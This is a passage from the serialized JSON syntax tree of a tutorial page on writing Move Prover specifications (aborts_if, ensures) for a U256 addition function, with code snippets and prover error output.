copy",{"type":28,"tag":116,"props":9085,"children":9086},{"style":266},[9087],{"type":33,"value":825},{"type":28,"tag":116,"props":9089,"children":9090},{"style":272},[9091],{"type":33,"value":9092},"drop",{"type":28,"tag":116,"props":9094,"children":9095},{"style":266},[9096],{"type":33,"value":825},{"type":28,"tag":116,"props":9098,"children":9099},{"style":272},[9100],{"type":33,"value":5612},{"type":28,"tag":116,"props":9102,"children":9103},{"style":266},[9104],{"type":33,"value":1291},{"type":28,"tag":116,"props":9106,"children":9107},{"class":245,"line":256},[9108,9113,9117,9121],{"type":28,"tag":116,"props":9109,"children":9110},{"style":272},[9111],{"type":33,"value":9112},"    v0",{"type":28,"tag":116,"props":9114,"children":9115},{"style":370},[9116],{"type":33,"value":4160},{"type":28,"tag":116,"props":9118,"children":9119},{"style":339},[9120],{"type":33,"value":5531},{"type":28,"tag":116,"props":9122,"children":9123},{"style":266},[9124],{"type":33,"value":3178},{"type":28,"tag":116,"props":9126,"children":9127},{"class":245,"line":293},[9128,9133,9137,9141],{"type":28,"tag":116,"props":9129,"children":9130},{"style":272},[9131],{"type":33,"value":9132},"    v1",{"type":28,"tag":116,"props":9134,"children":9135},{"style":370},[9136],{"type":33,"value":4160},{"type":28,"tag":116,"props":9138,"children":9139},{"style":339},[9140],{"type":33,"value":5531},{"type":28,"tag":116,"props":9142,"children":9143},{"style":266},[9144],{"type":33,"value":3178},{"type":28,"tag":116,"props":9146,"children":9147},{"class":245,"line":361},[9148,9153,9157,9161],{"type":28,"tag":116,"props":9149,"children":9150},{"style":272},[9151],{"type":33,"value":9152},"    v2",{"type":28,"tag":116,"props":9154,"children":9155},{"style":370},[9156],{"type":33,"value":4160},{"type":28,"tag":116,"props":9158,"children":9159},{"style":339},[9160],{"type":33,"value":5531},{"type":28,"tag":116,"props":9162,"children":9163},{"style":266},[9164],{"type":33,"value":3178},{"type":28,"tag":116,"props":9166,"children":9167},{"class":245,"line":387},[9168,9173,9177,9181],{"type":28,"tag":116,"props":9169,"children":9170},{"style":272},[9171],{"type":33,"value":9172},"    v3",{"type":28,"tag":116,"props":9174,"children":9175},{"style":370},[9176],{"type":33,"value":4160},{"type":28,"tag":116,"props":9178,"children":9179},{"style":339},[9180],{"type":33,"value":5531},{"type":28,"tag":116,"props":9182,"children":9183},{"style":266},[9184],{"type":33,"value":3178},{"type":28,"tag":116,"props":9186,"children":9187},{"class":245,"line":400},[9188],{"type":28,"tag":116,"props":9189,"children":9190},{"style":266},[9191],{"type":33,"value":406},{"type":28,"tag":29,"props":9193,"children":9194},{},[9195,9197,9203],{"type":33,"value":9196},"Now, let's consider the ",{"type":28,"tag":98,"props":9198,"children":9200},{"className":9199},[],[9201],{"type":33,"value":9202},"add(a: U256, b: U256): U256",{"type":33,"value":9204}," function. In order to verify the correctness of such a function, it might be useful to verify some of the group axioms, for example: commutativity and associativity.",{"type":28,"tag":29,"props":9206,"children":9207},{},[9208],{"type":33,"value":9209},"Specifications are declared in a specification block, which can be found in Move functions, as module member, or in a different file as a separate specification module.",{"type":28,"tag":29,"props":9211,"children":9212},{},[9213,9215,9221,9223,9230],{"type":33,"value":9214},"For example, if your file is ",{"type":28,"tag":98,"props":9216,"children":9218},{"className":9217},[],[9219],{"type":33,"value":9220},"sources/u256.move",{"type":33,"value":9222},", you can put specifications in ",{"type":28,"tag":87,"props":9224,"children":9227},{"href":9225,"rel":9226},"https://github.com/pontem-network/u256/blob/main/sources/u256.spec.move",[91],[9228],{"type":33,"value":9229},"sources/u256.spec.move",{"type":33,"value":141},{"type":28,"tag":234,"props":9232,"children":9234},{"code":9233,"language":2651,"meta":7,"className":2652,"style":7},"spec add { ... }\n",[9235],{"type":28,"tag":98,"props":9236,"children":9237},{"__ignoreMap":7},[9238],{"type":28,"tag":116,"props":9239,"children":9240},{"class":245,"line":246},[9241,9245,9250,9255,9260],{"type":28,"tag":116,"props":9242,"children":9243},{"style":272},[9244],{"type":33,"value":7947},{"type":28,"tag":116,"props":9246,"children":9247},{"style":272},[9248],{"type":33,"value":9249}," add",{"type":28,"tag":116,"props":9251,"children":9252},{"style":266},[9253],{"type":33,"value":9254}," { ",{"type":28,"tag":116,"props":9256,"children":9257},{"style":370},[9258],{"type":33,"value":9259},"...",{"type":28,"tag":116,"props":9261,"children":9262},{"style":266},[9263],{"type":33,"value":9264}," }\n",{"type":28,"tag":29,"props":9266,"children":9267},{},[9268,9270,9275],{"type":33,"value":9269},"The specifications placed inside the specification blocks are considered ",{"type":28,"tag":2583,"props":9271,"children":9272},{},[9273],{"type":33,"value":9274},"Expressions",{"type":33,"value":141},{"type":28,"tag":75,"props":9277,"children":9279},{"id":9278},"expressions",[9280],{"type":33,"value":9274},{"type":28,"tag":29,"props":9282,"children":9283},{},[9284],{"type":33,"value":9285},"Let's go over some common expressions.",{"type":28,"tag":29,"props":9287,"children":9288},{},[9289,9294],{"type":28,"tag":98,"props":9290,"children":9292},{"className":9291},[],[9293],{"type":33,"value":7997},{"type":33,"value":9295}," defines when the function can abort. This is especially useful in the context of smart contract development, where an abort would cause the entire transaction to rollback.",{"type":28,"tag":29,"props":9297,"children":9298},{},[9299,9301,9307],{"type":33,"value":9300},"For example, the ",{"type":28,"tag":98,"props":9302,"children":9304},{"className":9303},[],[9305],{"type":33,"value":9306},"add",{"type":33,"value":9308}," function aborts if and only if the U256 addition overflows. Let's put these words into an expression:",{"type":28,"tag":234,"props":9310,"children":9312},{"code":9311,"language":2651,"meta":7,"className":2652,"style":7},"const P64: u128 = 0x10000000000000000;\n\nspec fun value_of_U256(a: U256): num {\n    a.v0 +\n    a.v1 * P64 +\n    a.v2 * P64 * P64 +\n    a.v3 * P64 * P64 * P64\n}\n\nspec add {\n    aborts_if value_of_U256(a) + value_of_U256(b) >= P64 * P64 * P64 * P64;\n}\n",[9313],{"type":28,"tag":98,"props":9314,"children":9315},{"__ignoreMap":7},[9316,9350,9357,9406,9428,9456,9493,9534,9541,9548,9563,9644],{"type":28,"tag":116,"props":9317,"children":9318},{"class":245,"line":246},[9319,9324,9329,9333,9337,9341,9346],{"type":28,"tag":116,"props":9320,"children":9321},{"style":376},[9322],{"type":33,"value":9323},"const",{"type":28,"tag":116,"props":9325,"children":9326},{"style":266},[9327],{"type":33,"value":9328}," P64",{"type":28,"tag":116,"props":9330,"children":9331},{"style":370},[9332],{"type":33,"value":4160},{"type":28,"tag":116,"props":9334,"children":9335},{"style":339},[9336],{"type":33,"value":8518},{"type":28,"tag":116,"props":9338,"children":9339},{"style":370},[9340],{"type":33,"value":2226},{"type":28,"tag":116,"props":9342,"children":9343},{"style":350},[9344],{"type":33,"value":9345}," 0x10000000000000000",{"type":28,"tag":116,"props":9347,"children":9348},{"style":266},[9349],{"type":33,"value":384},{"type":28,"tag":116,"props":9351,"children":9352},{"class":245,"line":256},[9353],{"type":28,"tag":116,"props":9354,"children":9355},{"emptyLinePlaceholder":19},[9356],{"type":33,"value":1044},{"type":28,"tag":116,"props":9358,"children":9359},{"class":245,"line":293},[9360,9364,9368,9373,9377,9381,9385,9389,9393,9397,9402],{"type":28,"tag":116,"props":9361,"children":9362},{"style":272},[9363],{"type":33,"value":7947},{"type":28,"tag":116,"props":9365,"children":9366},{"style":272},[9367],{"type":33,"value":5878},{"type":28,"tag":116,"props":9369,"children":9370},{"style":282},[9371],{"type":33,"value":9372}," value_of_U256",{"type":28,"tag":116,"props":9374,"children":9375},{"style":266},[9376],{"type":33,"value":313},{"type":28,"tag":116,"props":9378,"children":9379},{"style":272},[9380],{"type":33,"value":87},{"type":28,"tag":116,"props":9382,"children":9383},{"style":370},[9384],{"type":33,"value":4160},{"type":28,"tag":116,"props":9386,"children":9387},{"style":339},[9388],{"type":33,"value":4400},{"type":28,"tag":116,"props":9390,"children":9391},{"style":266},[9392],{"type":33,"value":1829},{"type":28,"tag":116,"props":9394,"children":9395},{"style":370},[9396],{"type":33,"value":4160},{"type":28,"tag":116,"props":9398,"children":9399},{"style":272},[9400],{"type":33,"value":9401}," num",{"type":28,"tag":116,"props":9403,"children":9404},{"style":266},[9405],{"type":33,"value":1291},{"type":28,"tag":116,"props":9407,"children":9408},{"class":245,"line":361},[9409,9414,9418,9423],{"type":28,"tag":116,"props":9410,"children":9411},{"style":272},[9412],{"type":33,"value":9413},"    a",{"type":28,"tag":116,"props":9415,"children":9416},{"style":370},[9417],{"type":33,"value":141},{"type":28,"tag":116,"props":9419,"children":9420},{"style":266},[9421],{"type":33,"value":9422},"v0 ",{"type":28,"tag":116,"props":9424,"children":9425},{"style":370},[9426],{"type":33,"value":9427},"+\n",{"type":28,"tag":116,"props":9429,"children":9430},{"class":245,"line":387},[9431,9435,9439,9444,9448,9452],{"type":28,"tag":116,"props":9432,"children":9433},{"style":272},[9434],{"type":33,"value":9413},{"type":28,"tag":116,"props":9436,"children":9437},{"style":370},[9438],{"type":33,"value":141},{"type":28,"tag":116,"props":9440,"children":9441},{"style":266},[9442],{"type":33,"value":9443},"v1 ",{"type":28,"tag":116,"props":9445,"children":9446},{"style":370},[9447],{"type":33,"value":4240},{"type":28,"tag":116,"props":9449,"children":9450},{"style":339},[9451],{"type":33,"value":9328},{"type":28,"tag":116,"props":9453,"children":9454},{"style":370},[9455],{"type":33,"value":2245},{"type":28,"tag":116,"props":9457,"children":9458},{"class":245,"line":400},[9459,9463,9467,9472,9476,9480,9485,9489],{"type":28,"tag":116,"props":9460,"children":9461},{"style":272},[9462],{"type":33,"value":9413},{"type":28,"tag":116,"props":9464,"children":9465},{"style":370},[9466],{"type":33,"value":141},{"type":28,"tag":116,"props":9468,"children":9469},{"style":266},[9470],{"type":33,"value":9471},"v2 ",{"type":28,"tag":116,"props":9473,"children":9474},{"style":370},[9475],{"type":33,"value":4240},{"type":28,"tag":116,"props":9477,"children":9478},{"style":339},[9479],{"type":33,"value":9328},{"type":28,"tag":116,"props":9481,"children":9482},{"style":370},[9483],{"type":33,"value":9484}," *",{"type":28,"tag":116,"props":9486,"children":9487},{"style":339},[9488],{"type":33,"value":9328},{"type":28,"tag":116,"props":9490,"children":9491},{"style":370},[9492],{"type":33,"value":2245},{"type":28,"tag":116,"props":9494,"children":9495},{"class":245,"line":614},[9496,9500,9504,9509,9513,9517,9521,9525,9529],{"type":28,"tag":116,"props":9497,"children":9498},{"style":272},[9499],{"type":33,"value":9413},{"type":28,"tag":116,"props":9501,"children":9502},{"style":370},[9503],{"type":33,"value":141},{"type":28,"tag":116,"props":9505,"children":9506},{"style":266},[9507],{"type":33,"value":9508},"v3 ",{"type":28,"tag":116,"props":9510,"children":9511},{"style":370},[9512],{"type":33,"value":4240},{"type":28,"tag":116,"props":9514,"children":9515},{"style":339},[9516],{"type":33,"value":9328},{"type":28,"tag":116,"props":9518,"children":9519},{"style":370},[9520],{"type":33,"value":9484},{"type":28,"tag":116,"props":9522,"children":9523},{"style":339},[9524],{"type":33,"value":9328},{"type":28,"tag":116,"props":9526,"children":9527},{"style":370},[9528],{"type":33,"value":9484},{"type":28,"tag":116,"props":9530,"children":9531},{"style":339},[9532],{"type":33,"value":9533}," P64\n",{"type":28,"tag":116,"props":9535,"children":9536},{"class":245,"line":631},[9537],{"type":28,"tag":116,"props":9538,"children":9539},{"style":266},[9540],{"type":33,"value":406},{"type":28,"tag":116,"props":9542,"children":9543},{"class":245,"line":665},[9544],{"type":28,"tag":116,"props":9545,"children":9546},{"emptyLinePlaceholder":19},[9547],{"type":33,"value":1044},{"type":28,"tag":116,"props":9549,"children":9550},{"class":245,"line":713},[9551,9555,9559],{"type":28,"tag":116,"props":9552,"children":9553},{"style":272},[9554],{"type":33,"value":7947},{"type":28,"tag":116,"props":9556,"children":9557},{"style":272},[9558],{"type":33,"value":9249},{"type":28,"tag":116,"props":9560,"children":9561},{"style":266},[9562],{"type":33,"value":1291},{"type":28,"tag":116,"props":9564,"children":9565},{"class":245,"line":750},[9566,9571,9575,9579,9583,9587,9591,9595,9599,9603,9607,9612,9616,9620,9624,9628,9632,9636,9640],{"type":28,"tag":116,"props":9567,"children":9568},{"style":272},[9569],{"type":33,"value":9570},"    aborts_if",{"type":28,"tag":116,"props":9572,"children":9573},{"style":282},[9574],{"type":33,"value":9372},{"type":28,"tag":116,"props":9576,"children":9577},{"style":266},[9578],{"type":33,"value":313},{"type":28,"tag":116,"props":9580,"children":9581},{"style":272},[9582],{"type":33,"value":87},{"type":28,"tag":116,"props":9584,"children":9585},{"style":266},[9586],{"type":33,"value":1609},{"type":28,"tag":116,"props":9588,"children":9589},{"style":370},[9590],{"type":33,"value":2268},{"type":28,"tag":116,"props":9592,"children":9593},{"style":282},[9594],{"type":33,"value":9372},{"type":28,"tag":116,"props":9596,"children":9597},{"style":266},[9598],{"type":33,"value":313},{"type":28,"tag":116,"props":9600,"children":9601},{"style":272},[9602],{"type":33,"value":2893},{"type":28,"tag":116,"props":9604,"children":9605},{"style":266},[9606],{"type":33,"value":1609},{"type":28,"tag":116,"props":9608,"children":9609},{"style":370},[9610],{"type":33,"value":9611},">=",{"type":28,"tag":116,"props":9613,"children":9614},{"style":339},[9615],{"type":33,"value":9328},{"type":28,"tag":116,"props":9617,"children":9618},{"style":370},[9619],{"type":33,"value":9484},{"type":28,"tag":116,"props":9621,"children":9622},{"style":339},[9623],{"type":33,"value":9328},{"type":28,"tag":116,"props":9625,"children":9626},{"style":370},[9627],{"type":33,"value":9484},{"type":28,"tag":116,"props":9629,"children":9630},{"style":339},[9631],{"type":33,"value":9328},{"type":28,"tag":116,"props":9633,"children":9634},{"style":370},[9635],{"type":33,"value":9484},{"type":28,"tag":116,"props":9637,"children":9638},{"style":339},[9639],{"type":33,"value":9328},{"type":28,"tag":116,"props":9641,"children":9642},{"style":266},[9643],{"type":33,"value":384},{"type":28,"tag":116,"props":9645,"children":9646},{"class":245,"line":779},[9647],{"type":28,"tag":116,"props":9648,"children":9649},{"style":266},[9650],{"type":33,"value":406},{"type":28,"tag":29,"props":9652,"children":9653},{},[9654,9656,9663],{"type":33,"value":9655},"We can observe in the snippet above, that we are allowed to call functions inside the spec block. However, the callee must either be an ",{"type":28,"tag":87,"props":9657,"children":9660},{"href":9658,"rel":9659},"https://github.com/move-language/move/blob/f7d5b1a3f4d622c17f540190fa4fa12323cb0bb8/language/move-prover/doc/user/spec-lang.md#builtin-functions",[91],[9661],{"type":33,"value":9662},"MSL function",{"type":33,"value":9664},", or a pure Move function. A pure Move function can be defined as a function that does not modify the global state or use Move expression features unsupported by MSL.",{"type":28,"tag":29,"props":9666,"children":9667},{},[9668,9670,9675,9676,9681],{"type":33,"value":9669},"A common pattern for ",{"type":28,"tag":98,"props":9671,"children":9673},{"className":9672},[],[9674],{"type":33,"value":7997},{"type":33,"value":5172},{"type":28,"tag":98,"props":9677,"children":9679},{"className":9678},[],[9680],{"type":33,"value":8005},{"type":33,"value":9682},", which lets you prove that a function will never abort.",{"type":28,"tag":234,"props":9684,"children":9686},{"code":9685,"language":2651,"meta":7,"className":2652,"style":7},"spec critical_function {\n    aborts_if false;\n}\n",[9687],{"type":28,"tag":98,"props":9688,"children":9689},{"__ignoreMap":7},[9690,9706,9721],{"type":28,"tag":116,"props":9691,"children":9692},{"class":245,"line":246},[9693,9697,9702],{"type":28,"tag":116,"props":9694,"children":9695},{"style":272},[9696],{"type":33,"value":7947},{"type":28,"tag":116,"props":9698,"children":9699},{"style":272},[9700],{"type":33,"value":9701}," critical_function",{"type":28,"tag":116,"props":9703,"children":9704},{"style":266},[9705],{"type":33,"value":1291},{"type":28,"tag":116,"props":9707,"children":9708},{"class":245,"line":256},[9709,9713,9717],{"type":28,"tag":116,"props":9710,"children":9711},{"style":272},[9712],{"type":33,"value":9570},{"type":28,"tag":116,"props":9714,"children":9715},{"style":376},[9716],{"type":33,"value":1022},{"type":28,"tag":116,"props":9718,"children":9719},{"style":266},[9720],{"type":33,"value":384},{"type":28,"tag":116,"props":9722,"children":9723},{"class":245,"line":293},[9724],{"type":28,"tag":116,"props":9725,"children":9726},{"style":266},[9727],{"type":33,"value":406},{"type":28,"tag":29,"props":9729,"children":9730},{},[9731,9733,9739],{"type":33,"value":9732},"Another type of expression that we can use is ",{"type":28,"tag":98,"props":9734,"children":9736},{"className":9735},[],[9737],{"type":33,"value":9738},"ensures",{"type":33,"value":9740},". As the name suggests, it ensures that a certain condition is true at the end of a function's execution.",{"type":28,"tag":29,"props":9742,"children":9743},{},[9744,9746,9751,9753,9758],{"type":33,"value":9745},"In the case of the ",{"type":28,"tag":98,"props":9747,"children":9749},{"className":9748},[],[9750],{"type":33,"value":9306},{"type":33,"value":9752}," function, we want to ensure that the return value is the sum of the 2 parameters. Note that because ",{"type":28,"tag":4995,"props":9754,"children":9755},{},[9756],{"type":33,"value":9757},"MSL uses unbounded numbers",{"type":33,"value":9759},", we're able to very cleanly express this property without worrying about overflows.",{"type":28,"tag":234,"props":9761,"children":9763},{"code":9762,"language":2651,"meta":7,"className":2652,"style":7},"spec add {\n    aborts_if value_of_U256(a) + value_of_U256(b) >= P64 * P64 * P64 * P64;\n    ensures value_of_U256(result) == value_of_U256(a) + value_of_U256(b);\n}\n",[9764],{"type":28,"tag":98,"props":9765,"children":9766},{"__ignoreMap":7},[9767,9782,9861,9925],{"type":28,"tag":116,"props":9768,"children":9769},{"class":245,"line":246},[9770,9774,9778],{"type":28,"tag":116,"props":9771,"children":9772},{"style":272},[9773],{"type":33,"value":7947},{"type":28,"tag":116,"props":9775,"children":9776},{"style":272},[9777],{"type":33,"value":9249},{"type":28,"tag":116,"props":9779,"children":9780},{"style":266},[9781],{"type":33,"value":1291},{"type":28,"tag":116,"props":9783,"children":9784},{"class":245,"line":256},[9785,9789,9793,9797,9801,9805,9809,9813,9817,9821,9825,9829,9833,9837,9841,9845,9849,9853,9857],{"type":28,"tag":116,"props":9786,"children":9787},{"style":272},[9788],{"type":33,"value":9570},{"type":28,"tag":116,"props":9790,"children":9791},{"style":282},[9792],{"type":33,"value":9372},{"type":28,"tag":116,"props":9794,"children":9795},{"style":266},[9796],{"type":33,"value":313},{"type":28,"tag":116,"props":9798,"children":9799},{"style":272},[9800],{"type":33,"value":87},{"type":28,"tag":116,"props":9802,"children":9803},{"style":266},[9804],{"type":33,"value":1609},{"type":28,"tag":116,"props":9806,"children":9807},{"style":370},[9808],{"type":33,"value":2268},{"type":28,"tag":116,"props":9810,"children":9811},{"style":282},[9812],{"type":33,"value":9372},{"type":28,"tag":116,"props":9814,"children":9815},{"style":266},[9816],{"type":33,"value":313},{"type":28,"tag":116,"props":9818,"children":9819},{"style":272},[9820],{"type":33,"value":2893},{"type":28,"tag":116,"props":9822,"children":9823},{"style":266},[9824],{"type":33,"value":1609},{"type":28,"tag":116,"props":9826,"children":9827},{"style":370},[9828],{"type":33,"value":9611},{"type":28,"tag":116,"props":9830,"children":9831},{"style":339},[9832],{"type":33,"value":9328},{"type":28,"tag":116,"props":9834,"children":9835},{"style":370},[9836],{"type":33,"value":9484},{"type":28,"tag":116,"props":9838,"children":9839},{"style":339},[9840],{"type":33,"value":9328},{"type":28,"tag":116,"props":9842,"children":9843},{"style":370},[9844],{"type":33,"value":9484},{"type":28,"tag":116,"props":9846,"children":9847},{"style":339},[9848],{"type":33,"value":9328},{"type":28,"tag":116,"props":9850,"children":9851},{"style":370},[9852],{"type":33,"value":9484},{"type":28,"tag":116,"props":9854,"children":9855},{"style":339},[9856],{"type":33,"value":9328},{"type":28,"tag":116,"props":9858,"children":9859},{"style":266},[9860],{"type":33,"value":384},{"type":28,"tag":116,"props":9862,"children":9863},{"class":245,"line":293},[9864,9869,9873,9877,9881,9885,9889,9893,9897,9901,9905,9909,9913,9917,9921],{"type":28,"tag":116,"props":9865,"children":9866},{"style":272},[9867],{"type":33,"value":9868},"    ensures",{"type":28,"tag":116,"props":9870,"children":9871},{"style":282},[9872],{"type":33,"value":9372},{"type":28,"tag":116,"props":9874,"children":9875},{"style":266},[9876],{"type":33,"value":313},{"type":28,"tag":116,"props":9878,"children":9879},{"style":272},[9880],{"type":33,"value":8751},{"type":28,"tag":116,"props":9882,"children":9883},{"style":266},[9884],{"type":33,"value":1609},{"type":28,"tag":116,"props":9886,"children":9887},{"style":370},[9888],{"type":33,"value":2340},{"type":28,"tag":116,"props":9890,"children":9891},{"style":282},[9892],{"type":33,"value":9372},{"type":28,"tag":116,"props":9894,"children":9895},{"style":266},[9896],{"type":33,"value":313},{"type":28,"tag":116,"props":9898,"children":9899},{"style":272},[9900],{"type":33,"value":87},{"type":28,"tag":116,"props":9902,"children":9903},{"style":266},[9904],{"type":33,"value":1609},{"type":28,"tag":116,"props":9906,"children":9907},{"style":370},[9908],{"type":33,"value":2268},{"type":28,"tag":116,"props":9910,"children":9911},{"style":282},[9912],{"type":33,"value":9372},{"type":28,"tag":116,"props":9914,"children":9915},{"style":266},[9916],{"type":33,"value":313},{"type":28,"tag":116,"props":9918,"children":9919},{"style":272},[9920],{"type":33,"value":2893},{"type":28,"tag":116,"props":9922,"children":9923},{"style":266},[9924],{"type":33,"value":895},{"type":28,"tag":116,"props":9926,"children":9927},{"class":245,"line":361},[9928],{"type":28,"tag":116,"props":9929,"children":9930},{"style":266},[9931],{"type":33,"value":406},{"type":28,"tag":29,"props":9933,"children":9934},{},[9935],{"type":33,"value":9936},"Note that because Move specification functions are written in MSL, the numbers are unbounded and we can define the expression without risk of overflow.",{"type":28,"tag":29,"props":9938,"children":9939},{},[9940],{"type":33,"value":9941},"Let's try to prove the library with the specifications from above:",{"type":28,"tag":234,"props":9943,"children":9945},{"code":9944,"language":3911,"meta":7,"className":3912,"style":7},"$ move prove\n",[9946],{"type":28,"tag":98,"props":9947,"children":9948},{"__ignoreMap":7},[9949],{"type":28,"tag":116,"props":9950,"children":9951},{"class":245,"line":246},[9952,9957,9962],{"type":28,"tag":116,"props":9953,"children":9954},{"style":282},[9955],{"type":33,"value":9956},"$",{"type":28,"tag":116,"props":9958,"children":9959},{"style":563},[9960],{"type":33,"value":9961}," move",{"type":28,"tag":116,"props":9963,"children":9964},{"style":563},[9965],{"type":33,"value":9966}," prove\n",{"type":28,"tag":29,"props":9968,"children":9969},{},[9970],{"type":33,"value":9971},"It outputs the following error information:",{"type":28,"tag":234,"props":9973,"children":9975},{"code":9974,"language":3911,"meta":7,"className":3912,"style":7},"[...]\n\nerror: abort not covered by any of the `aborts_if` clauses\n╭     spec add {\n|         aborts_if value_of_U256(a) + value_of_U256(b) >= P64 * P64 * P64 * P64;\n|         ensures value_of_U256(result) == value_of_U256(a) + value_of_U256(b);\n|     }\n╰─────^\n\n[...]\n\n at ./sources/u256.move:316: add\n enter loop, variable(s) carry, i, ret havocked and reassigned\n     carry = 54\n     i = 3792\n     ret = u256.U256{v0 = 26418, v1 = 27938, v2 = 6900, v3 = 1999}\n at ./sources/u256.move:346: add\n     ABORTED\n\nFAILURE proving 1 modules from package `u256` in 9.143s\n{\n    \"Error\": \"Move Prover failed: exiting with verification errors\"\n}\n",[9976],{"type":28,"tag":98,"props":9977,"children":9978},{"__ignoreMap":7},[9979,9987,9994,10055,10076,10165,10233,10245,10253,10260,10267,10274,10292,10353,10370,10387,10459,10475,10483,10490,10540,10548,10565],{"type":28,"tag":116,"props":9980,"children":9981},{"class":245,"line":246},[9982],{"type":28,"tag":116,"props":9983,"children":9984},{"style":266},[9985],{"type":33,"value":9986},"[...]\n",{"type":28,"tag":116,"props":9988,"children":9989},{"class":245,"line":256},[9990],{"type":28,"tag":116,"props":9991,"children":9992},{"emptyLinePlaceholder":19},[9993],{"type":33,"value":1044},{"type":28,"tag":116,"props":9995,"children":9996},{"class":245,"line":293},[9997,10002,10007,10012,10017,10022,10027,10032,10037,10042,10046,10050],{"type":28,"tag":116,"props":9998,"children":9999},{"style":282},[10000],{"type":33,"value":10001},"error:",{"type":28,"tag":116,"props":10003,"children":10004},{"style":563},[10005],{"type":33,"value":10006}," abort",{"type":28,"tag":116,"props":10008,"children":10009},{"style":563},[10010],{"type":33,"value":10011}," not",{"type":28,"tag":116,"props":10013,"children":10014},{"style":563},[10015],{"type":33,"value":10016}," covered",{"type":28,"tag":116,"props":10018,"children":10019},{"style":563},[10020],{"type":33,"value":10021}," by",{"type":28,"tag":116,"props":10023,"children":10024},{"style":563},[10025],{"type":33,"value":10026}," any",{"type":28,"tag":116,"props":10028,"children":10029},{"style":563},[10030],{"type":33,"value":10031}," of",{"type":28,"tag":116,"props":10033,"children":10034},{"style":563},[10035],{"type":33,"value":10036}," the",{"type":28,"tag":116,"props":10038,"children":10039},{"style":563},[10040],{"type":33,"value":10041}," `",{"type":28,"tag":116,"props":10043,"children":10044},{"style":282},[10045],{"type":33,"value":7997},{"type":28,"tag":116,"props":10047,"children":10048},{"style":563},[10049],{"type":33,"value":890},{"type":28,"tag":116,"props":10051,"children":10052},{"style":282},[10053],{"type":33,"value":10054}," clauses\n",{"type":28,"tag":116,"props":10056,"children":10057},{"class":245,"line":361},[10058,10063,10068,10072],{"type":28,"tag":116,"props":10059,"children":10060},{"style":282},[10061],{"type":33,"value":10062},"╭",{"type":28,"tag":116,"props":10064,"children":10065},{"style":563},[10066],{"type":33,"value":10067},"     spec",{"type":28,"tag":116,"props":10069,"children":10070},{"style":563},[10071],{"type":33,"value":9249},{"type":28,"tag":116,"props":10073,"children":10074},{"style":563},[10075],{"type":33,"value":1291},{"type":28,"tag":116,"props":10077,"children":10078},{"class":245,"line":387},[10079,10084,10089,10093,10097,10101,10105,10109,10113,10117,10121,10125,10129,10133,10137,10141,10145,10149,10153,10157,10161],{"type":28,"tag":116,"props":10080,"children":10081},{"style":370},[10082],{"type":33,"value":10083},"|",{"type":28,"tag":116,"props":10085,"children":10086},{"style":282},[10087],{"type":33,"value":10088},"         aborts_if",{"type":28,"tag":116,"props":10090,"children":10091},{"style":563},[10092],{"type":33,"value":9372},{"type":28,"tag":116,"props":10094,"children":10095},{"style":266},[10096],{"type":33,"value":313},{"type":28,"tag":116,"props":10098,"children":10099},{"style":282},[10100],{"type":33,"value":87},{"type":28,"tag":116,"props":10102,"children":10103},{"style":266},[10104],{"type":33,"value":1609},{"type":28,"tag":116,"props":10106,"children":10107},{"style":563},[10108],{"type":33,"value":2268},{"type":28,"tag":116,"props":10110,"children":10111},{"style":563},[10112],{"type":33,"value":9372},{"type":28,"tag":116,"props":10114,"children":10115},{"style":266},[10116],{"type":33,"value":313},{"type":28,"tag":116,"props":10118,"children":10119},{"style":282},[10120],{"type":33,"value":2893},{"type":28,"tag":116,"props":10122,"children":10123},{"style":266},[10124],{"type":33,"value":1609},{"type":28,"tag":116,"props":10126,"children":10127},{"style":370},[10128],{"type":33,"value":645},{"type":28,"tag":116,"props":10130,"children":10131},{"style":563},[10132],{"type":33,"value":373},{"type":28,"tag":116,"props":10134,"children":10135},{"style":563},[10136],{"type":33,"value":9328},{"type":28,"tag":116,"props":10138,"children":10139},{"style":376},[10140],{"type":33,"value":9484},{"type":28,"tag":116,"props":10142,"children":10143},{"style":563},[10144],{"type":33,"value":9328},{"type":28,"tag":116,"props":10146,"children":10147},{"style":376},[10148],{"type":33,"value":9484},{"type":28,"tag":116,"props":10150,"children":10151},{"style":563},[10152],{"type":33,"value":9328},{"type":28,"tag":116,"props":10154,"children":10155},{"style":376},[10156],{"type":33,"value":9484},{"type":28,"tag":116,"props":10158,"children":10159},{"style":563},[10160],{"type":33,"value":9328},{"type":28,"tag":116,"props":10162,"children":10163},{"style":266},[10164],{"type":33,"value":384},{"type":28,"tag":116,"props":10166,"children":10167},{"class":245,"line":400},[10168,10172,10177,10181,10185,10189,10193,10197,10201,10205,10209,10213,10217,10221,10225,10229],{"type":28,"tag":116,"props":10169,"children":10170},{"style":370},[10171],{"type":33,"value":10083},{"type":28,"tag":116,"props":10173,"children":10174},{"style":282},[10175],{"type":33,"value":10176},"         ensures",{"type":28,"tag":116,"props":10178,"children":10179},{"style":563},[10180],{"type":33,"value":9372},{"type":28,"tag":116,"props":10182,"children":10183},{"style":266},[10184],{"type":33,"value":313},{"type":28,"tag":116,"props":10186,"children":10187},{"style":282},[10188],{"type":33,"value":8751},{"type":28,"tag":116,"props":10190,"children":10191},{"style":266},[10192],{"type":33,"value":1609},{"type":28,"tag":116,"props":10194,"children":10195},{"style":563},[10196],{"type":33,"value":2340},{"type":28,"tag":116,"props":10198,"children":10199},{"style":563},[10200],{"type":33,"value":9372},{"type":28,"tag":116,"props":10202,"children":10203},{"style":266},[10204],{"type":33,"value":313},{"type":28,"tag":116,"props":10206,"children":10207},{"style":282},[10208],{"type":33,"value":87},{"type":28,"tag":116,"props":10210,"children":10211},{"style":266},[10212],{"type":33,"value":1609},{"type":28,"tag":116,"props":10214,"children":10215},{"style":563},[10216],{"type":33,"value":2268},{"type":28,"tag":116,"props":10218,"children":10219},{"style":563},[10220],{"type":33,"value":9372},{"type":28,"tag":116,"props":10222,"children":10223},{"style":266},[10224],{"type":33,"value":313},{"type":28,"tag":116,"props":10226,"children":10227},{"style":282},[10228],{"type":33,"value":2893},{"type":28,"tag":116,"props":10230,"children":10231},{"style":266},[10232],{"type":33,"value":895},{"type":28,"tag":116,"props":10234,"children":10235},{"class":245,"line":614},[10236,10240],{"type":28,"tag":116,"props":10237,"children":10238},{"style":370},[10239],{"type":33,"value":10083},{"type":28,"tag":116,"props":10241,"children":10242},{"style":266},[10243],{"type":33,"value":10244},"     